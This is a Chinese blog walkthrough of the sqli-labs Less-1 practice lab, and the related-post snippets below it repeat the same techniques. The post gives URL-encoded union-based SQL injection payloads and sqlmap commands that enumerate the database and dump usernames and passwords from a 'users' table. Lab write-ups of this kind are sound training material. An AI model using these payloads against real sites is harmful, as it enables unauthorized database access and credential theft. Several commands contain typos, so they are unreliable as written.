SQL注入sqli-labs学习(less-1)

最新推荐文章于 2024-03-03 15:02:56 发布
最新推荐文章于 2024-03-03 15:02:56 发布
阅读量2.7k 收藏 12
点赞数 2
分类专栏: ctf 文章标签: mysql sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yy10205473/article/details/109134563
版权

sqli-labs靶场网址.
http://154.223.137.85:83/

通过sqli-labs中的题目来学习sql注入。

sql注入的基本步骤

(1)判断是否存在注入,判断类型并且闭合语句
(2)使用order by 关键字来判断字段数
(3)选择注入语句,使用union查询或者报错注入
(4)获取数据库用户,版本,当前连接的数据库等信息
(5)获取某个数据库表的信息,获取列信息
(6)获取表中的数据

手工注入

进入less-1页面,根据页面的英文提示,发现需要我们输入参数在这里插入图片描述
在后面添加参数。

http://10.1.26.253:8000/Less-1/?id=1

发现不会报错

在这里插入图片描述

判断是否存在注入点

http://10.1.26.253:8000/Less-1/?id=1’

在参数后加入单引号’,发现页面会显示报错信息,表示该网站可能存在注入点。

在这里插入图片描述

手工sql注入判断是否存在注入点资料:
https://www.cnblogs.com/SCHAOGES/p/10889654.html

判断注入类型

数字型注入测试

在id后加 %20and%201=1

注:%20为url编码之中的空格号。

http://10.1.26.253:8000/Less-1/?id=1%20and%201=1
除去url编码为:http://10.1.26.253:8000/Less-1/?id=1 and 1=1

返回值正常
在这里插入图片描述

在id后面加入%20and%201=2

http://10.1.26.253:8000/Less-1/?id=1%20and%201=2
除去url编码为:http://10.1.26.253:8000/Less-1/?id=1 and 1=2

发现返回值同样正常。
在这里插入图片描述所以该类型不为数字型注入。

字符型注入测试

在id后面加入%27%20and%271%27=%271

注:%27为url编码之中的单引号

http://10.1.26.253:8000/Less-1/?id=1%27%20and%20%271%27=%271
除去url编码后为:http://10.1.26.253:8000/Less-1/?id=1’ and ‘1’='1

在这里插入图片描述发现返回值正常
在id后面加%27%20and%20%271%27=%272

http://10.1.26.253:8000/Less-1/?id=1%27%20and%20%271%27=%272
除去url编码后为:http://10.1.26.253:8000/Less-1/?id=1’ and ‘1’='2

在这里插入图片描述

发现没有出现返回值。说明该注入类型为字符型。

注入类型资料:
https://www.cnblogs.com/aq-ry/p/9368619.html
https://blog.csdn.net/kerun1/article/details/103414797
http://blog.sina.com.cn/s/blog_8cc77f5e0101kzw8.html

查看数据表列数

使用SQL关键字order by来查看数据表的字段数

order by : 用于对结果集按照一个字段或者多个字段排序。
(以某一列为标准进行排序,当选择的字段不存在时会报错。)

http://10.1.26.253:8000/Less-1/?id=1%27%20order%20by%201,2,3,4–+
除去url编码后为:http://10.1.26.253:8000/Less-1/?id=1’ order by 1,2,3,4–+

最后面用- - +是因为这里我们的url在get方式提交的时候要进行一次url转码 所以我们要让转码后的字符为- - +来闭合语句;
在这里插入图片描述
当加到4的时候页面会报错,报错信息为(Unknown column ‘4’ in ‘order clause’)说明该数据表有三个字段;也可以说是有三列数据。

使用union查询

由于该题中的数据能够输出到页面之上,使用可以使用union注入从数据库中查询参数id对应的内容,然后将数据库的内容输出到页面上。
使用union select 查看返回值
SELECT SQL语句用于从数据库中选取数据。
UNION SQL操作符用于合并两个或多个 SELECT 语句的结果集。

输入%27union%20select%201,2,3–+

http://10.1.26.253:8000/Less-1/?id=1%27union%20select%201,2,3–+

在这里插入图片描述

发现页面并没有返回union select的结果。因为代码只返回第一条结果,所以这一条url发送出去后只返回了id=1的结果,之后的内容均被忽略掉了。我们需要重新时候设置参数id的值,让服务器能够返回id=1之后的结果。这里可以把1改成-1.由于数据库之中不存在id=-1的数据所以能够让服务器返回union select的数据。

将id=1改成id=-1

http://10.1.26.253:8000/Less-1/?id=-1%27union%20select%201,2,3–+

在这里插入图片描述
页面返回了2和3,意味着在union select 1,2,3中,2和3的位置可以输入sql语句

获取数据库信息

使用database()来获取数据库的名字。
database() :返回默认或当前数据库的名称
在这里插入图片描述得到该数据库名字为security

获取数据表

http://10.1.26.253:8000/Less-1/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()–+

去掉转义字符:
http://154.223.137.85:83/sqli-labs/Less-1/?id=-1’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+

注:
select 1,2,group_concat(table_name): 把table_name(表名)在3处打印出来。

information_schema.tables: MySQL自带数据库,保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。

table_schema: 数据表所属的数据库名。
在这里插入图片描述得到数据库security中存在了四张数据表。其中users翻译为用户,用户的数据大概率存在于该表之中,所以我们可以先对数据表users进行查询。

获取表的字段信息

http://10.1.26.253:8000/Less-1/
?id=-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20–+

去掉转义字符:
?id=-1’union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+

在这里插入图片描述

通过回显发现,users表中的三个字段为id,username,password。说明表users中存着用户的账号和密码。

获取表中数据

http://154.223.137.85:83/Less-1/?id=-1%27union%20select%201,group_concat(username),group_concat(password)%20from%20users–+

将username字段的数据打印到2处;将password字段的数据打印到3处。

在这里插入图片描述

手工注入成功,得到了users表中保存的用户的账户和密码。

SQL MAP 解法

检索数据库

在kali中打开sqlmap通过dbs命令来检索网站中的数据库。

sqlmap -u http://10.1.26.253:8000/Less-1/?id=1 -dbs

-dbs:检索所有数据库;
在这里插入图片描述

得到网站的数据库。
由上面的手工注入得到security为我们所需要的数据库。可以直接查询该数据库让我们省去查询其他数据库的时间。

检索数据库security中的表

sqlmap -u http://154.223.137.85:83/Less-1/?id=1 -dbms mysql -D security -tables

在这里插入图片描述
得到数据库security中全部的表

获取数据表users中的字段

qlmap -u http://154.223.137.85:83/Less-1/?id=1 --dbms mysql -D security -T users –columns

在这里插入图片描述
得到数据表users中的全部字段名

获取数据表users中的全部数据

sqlmap -u http://154.223.137.85:83/Less-1/?id=1 --dbms mysql -D security -T users -C username,password –dump

在这里插入图片描述
得到数据表users中的全部数据。

h关于SQLmap使用资料:
https://blog.csdn.net/qq_33530840/article/details/82144515
https://blog.csdn.net/qq_43621629/article/details/104530995
https://blog.csdn.net/qq_37964989/article/details/84109094

无领
关注
专栏目录
sqli-labs第一关sql注入流程
qq_33598708的博客
03-28 1691
正常访问 http://127.0.0.1/sqli-labs-master/Less-1/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and '1'='1 正常 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and '1'='2 错误 由' and '1'='1可知道是字符型,如果是数字型的这种会提示错误。 开始注入: http://127.0.0.
网络安全之sql注入-less1
koala_king的博客
08-17 1413
less-1 是字符注入,union注入的步骤一般有以下几步: 1、判断注入点 2、判断是整型还是字符型 3、判断查询列数 4、判断显示位 5、获取敏感信息 1、判断注入点 我们再Less1中看到,id将作为参数来使用,因此我们输入: http://localhost/Less-1/?id=1 这是看到访问了第一个用户的用户名和密码: 此时加入单引号进行尝试,这里是在id后面加了一个单引号,这里发现了语句的错误。 You have an error in your SQL syntax; check t
sqli-labs-less-1完整解析,小白干货
yzcn
10-22 2019
Less-1 Sql知识点: Limit(x,y):从x+1行开始输出,共输出y行 Order by:排序,asc升序(默认),desc(降序) Union:MySQL执行两条SELECT语句,并把输出组合成单个查询结果集 Group_concat:连接作用,group_concat( 要连接的字段 ) [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] concat_ws:concat_ws(‘-’,a,b) 将a和b用-连接起来 MySQL中默认建立的数据库
sqli-labs (less1-less4)
Xi4or0uji
07-24 1754
就只是随便记一记 less 1 get方法的引号闭合 id=1'有报错,证明有注入点,然后接下来是看一下有多少列 ?id=-1' union select 1,2,3--+' 这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来 剩下的就是爆数据库,表,字段,值了 爆数据库 ?id=-1' union select 1,gr...
sqli-labs靶场 SQL注入学习 Less-1
p4nic的博客
09-10 314
GET - Error based - Single quotes - String GET类型-基于报错的注入 类似于http://localhost/sqli-labs/Less-1/?id=1的URL,通过查询字符串(/?id=1)中传递参数 开发人员直接将GET获取到的参数直接与SQL语句拼接,使得待执行的SQL语句可控,即可以构造非法的SQL语句,造成了SQL注入漏洞 在注入之前,先了解一下MySQL数据库中的元数据 information_schema下的表格 informatio.
SQL注入——Less-1
一凡凡凡人的博客
09-14 1932
                 声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险!!!   打开主页进入第一关,提示输入参数id及它的值, 传入参数id=1后,我们会发现这个页面会根据传入的id查询到对应的用户及用户密码 我们可以通过查看数据库进行验证 这样我们就可以推断出PHP执行的SQL语句的功能是从数据库中查询出的信息为我们传入的id为1的...
SQL注入天书SQLi-LABS(Less1-7)
网络猿的博客
01-15 1313
SQL注入天书SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建 文章目录SQL注入天书SQLi-LABS(Less1-7)一、SQL注入天书SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入天书SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1437
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 735
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1909
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1255
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
Sqli-Labs学习sql注入Sqli-Labs less-1&2
vegetable_haker的博客
10-25 851
Sqli-Labs:Less-1 尝试传入参数 localhost/sqlilabs/Less-1/?id=1 localhost/sqlilabs/Less-1/?id=1' localhost/sqlilabs/Less-1/?id=1'' localhost/sqlilabs/Less-1/?id=1''' 在测试以上传参的时候发现第一和第三条的时候页面能正...
初学SQL注入(Less-1)
AmyBaby00的博客
08-08 957
字符型(单引号,小括号,双引号…)注意闭合 练习一、单引号闭合 1、 http://127.0.0.1/sqli/Less-1/index.php?id=1 http://127.0.0.1/sqli/Less-1/index.php?id=1' 备注:对特殊字符的过滤,是一种简单的防护 http://127.0.0.1/sqli/Less-1/index.php?id=2’ and 1=2 ...
Sqli 的Less-1和less-2操作步骤 ,求出username和password下的字段内容
m0_52341820的博客
04-13 433
Less-1: 进入Less-1页面: 检查页面是否存在sql注入,输入敏感字符%27,出现报错,说明存在注入漏洞。 判断查询表的列数:使用order by语句和二分法探测出列数为三 之后判断显示位:使用union select联合查询语句判断显示位,若希望显示出后面的,需要将union语句的前半部分显示为假 之后求当前数据库的名字,得出数据库名等于secuirty 之后查询数据的下的表名:http://127.0.0.1/sqli/Less-1/?id=-1' %20%20 un.
生命在于折腾——SQL注入的实操(一)less1-5
易水哲的博客
08-17 470
SQL-LIB less1-5
Sql注入-Less-1
dahege666的博客
04-02 426
一、环境搭建 apache+mysql+php Tomcat+mysql+java(部分关卡需要) 如果可以的话,推荐在 windows 和 linux 下分别安装: Windows 下可以用 wamp、phpstudy、apmserv 等直接安装,linux 下可在网上搜索教程进行 安装。我 的测 试 环 境 是 windows 下 用 phpstudy 直 接 搭 建 的. sqli-l...
sql注入sqli-labs(less11-less20)
小宇的web博客
03-17 813
sql注入sqli-labs(less11-less20)特详解 less11 1.输入用户名和密码admin和admin查看输出 2.利用burpsuite来进行抓包(这个抓包软件需要java环境自行配置和下载直接度娘,burp下载后还需要自行把火狐浏览器的代理服务器配置)。 3.打开burpsuite来进行抓包(uname=admin&passwd=admin&submit=Submit这个就是抓包的数据) 4.将这个数据复制后打开火狐浏览器,复制到指定的位置。(这时必须关闭bu
SQL注入闯关第一关-Less1
qq_54037445的博客
10-06 2072
SQL注入闯关
SQL注入——Less-1-5(学习笔记)
xdjxi的博客
02-25 2266
第一关 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入 3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入 4.接着使用order by 语句判断,该表中一共有几列数据 order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。5.将id=1改为一个数据库不存在的id值,如861,使用union select 1...
kafka的代码分析
最新发布
04-16
Kafka是一个分布式流处理平台,它具有高吞吐量、可扩展性和容错性的特点。下面是Kafka代码分析的一般步骤: 1. 了解Kafka的基本概念和架构:在进行代码分析之前,首先需要了解Kafka的基本概念,例如topic、partition、producer、consumer等,以及Kafka的整体架构和工作原理。 2. 下载和构建Kafka源代码:从Kafka官方网站下载源代码,并按照官方文档的指引进行构建。 3. 理解核心模块:Kafka的源代码包含多个核心模块,例如网络模块、存储模块、副本管理模块等。需要逐个模块进行分析,了解其功能和实现方式。 4. 阅读源代码:通过阅读源代码,可以深入了解Kafka的内部实现细节。可以从入口函数开始,逐步跟踪代码执行流程,理解每个函数和类的作用。 5. 调试和测试:在阅读源代码的过程中,可以结合调试工具对代码进行调试,观察变量的值和代码的执行流程,加深对代码的理解。同时,可以编写一些测试用例来验证代码的正确性。 6. 参考文档和社区讨论:在进行代码分析时,可以参考Kafka官方文档、API文档和源代码中的注释,以及Kafka社区中的讨论和文档,获取更多关于代码实现的细节和背景知识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值